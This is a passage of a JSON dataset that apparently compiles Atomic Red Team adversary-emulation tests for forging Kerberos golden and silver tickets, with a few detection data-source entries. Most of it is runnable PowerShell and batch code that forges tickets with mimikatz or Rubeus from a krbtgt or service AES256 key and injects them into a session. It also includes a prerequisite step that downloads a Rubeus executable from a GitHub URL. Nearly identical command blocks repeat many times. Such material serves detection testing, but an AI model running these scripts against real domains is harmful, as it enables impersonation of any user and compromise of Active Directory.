$domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt\" \"exit\"\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\#{domain}\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n" + } + }, + { + "name": "Crafting Active Directory golden tickets with Rubeus", + "auto_generated_guid": "e42d33cd-205c-4acf-ab59-a9f38f6bad9c", + "description": "Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.\nThis test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).\nThe generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domaincontroller": { + "description": "Targeted Active Directory domain FQDN", + "type": "String", + "default": "$ENV:logonserver.TrimStart('\\') + \".\" + \"$ENV:userdnsdomain\"" + }, + "account": { + "description": "Account to impersonate", + "type": "String", + "default": "$ENV:username" + }, + "krbtgt_aes256_key": { + "description": "Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain)", + "type": "String", + "default": "b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9" + }, + "local_folder": { + "description": "Local path of Rubeus executable", + "type": "Path", + "default": "$Env:temp" + }, + "local_executable": { + "description": "name of the rubeus executable", + "type": "String", + "default": "rubeus.exe" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + }, + { + "description": "Rubeus must exist\n", + "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Remove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden\n$filename = (Get-ChildItem | ? {$_.Name.startswith(\"golden_\")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to golden.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\golden.txt 2>&1 (\n echo Purge existing tickets and create golden ticket:\n klist purge\n cd %temp%\n \"#{local_folder}\\#{local_executable}\" ptt /ticket:kirbifile\n\n echo.\n echo Requesting SYSVOL:\n dir \\\\$(#{domaincontroller})\\SYSVOL\n \n echo.\n echo Tickets after requesting SYSVOL:\n klist\n\n echo.\n echo End of Golden Ticket attack\n)\n\"@ -Replace \"kirbifile\", $filename | Out-File -Encoding OEM $env:TEMP\\golden.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\golden.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\golden.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Golden Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\golden.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\golden.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\golden.txt -ErrorAction Ignore\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1558.002", + "command_list": [ + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.%userdnsdomain% /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.%userdnsdomain%\n schtasks /query /S #{target}.%userdnsdomain%\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:silverticketfakeuser /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:%logonserver:\\\\=%.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S %logonserver:\\\\=%.#{domain}\n schtasks /query /S %logonserver:\\\\=%.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n $env:TEMP\\mimikatz\\x64\\mimikatz.exe \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n" + ], + "commands": [ + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"S-1-5-21-DEFAULT\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.%userdnsdomain% /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.%userdnsdomain%\n schtasks /query /S #{target}.%userdnsdomain%\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:silverticketfakeuser /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:%logonserver:\\\\=%.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S %logonserver:\\\\=%.#{domain}\n schtasks /query /S %logonserver:\\\\=%.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n", + "source": "atomics/T1558.002/T1558.002.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Silver Ticket" + }, + { + "command": "Remove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n\n# get current domain SID if default was used\n$domain_sid = \"#{domain_sid}\"\nIf ($domain_sid -Match \"DEFAULT\") {\n # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60\n $domain = gwmi Win32_ComputerSystem | Select -Expand Domain\n $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire 